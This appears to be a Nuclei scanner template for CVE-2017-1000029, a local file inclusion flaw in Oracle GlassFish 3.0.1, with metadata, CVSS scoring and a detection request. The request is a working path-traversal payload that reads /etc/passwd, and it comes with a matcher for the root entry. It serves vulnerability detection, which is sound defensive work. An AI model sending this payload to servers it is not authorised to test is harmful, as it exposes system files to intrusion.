44 lines
1.7 KiB
YAML
44 lines
1.7 KiB
YAML
id: CVE-2017-1000029
|
|
|
|
info:
|
|
name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
|
|
remediation: |
|
|
Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
|
|
reference:
|
|
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
|
|
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-1000029
|
|
cwe-id: CWE-200
|
|
epss-score: 0.00387
|
|
epss-percentile: 0.70348
|
|
cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: oracle
|
|
product: glassfish_server
|
|
tags: cve,cve2017,glassfish,oracle,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/resource/file%3a///etc/passwd/"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 |